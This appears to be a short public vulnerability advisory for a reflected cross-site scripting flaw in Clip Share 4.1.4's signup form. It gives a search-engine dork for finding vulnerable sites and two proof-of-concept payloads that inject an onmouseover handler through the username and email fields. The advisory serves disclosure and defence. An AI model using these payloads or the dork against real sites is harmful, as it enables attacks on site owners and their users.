Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.
f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724
====================================================================================================================================
| # Title : Clip Share 4.1.4 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : https://www.clip-share.com/ |
| # Dork : Powered By ClipShare |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Xss :
This vulnerability affects /ClipShare/signup.
URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="
The input is reflected inside a tag parameter between double quotes.
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================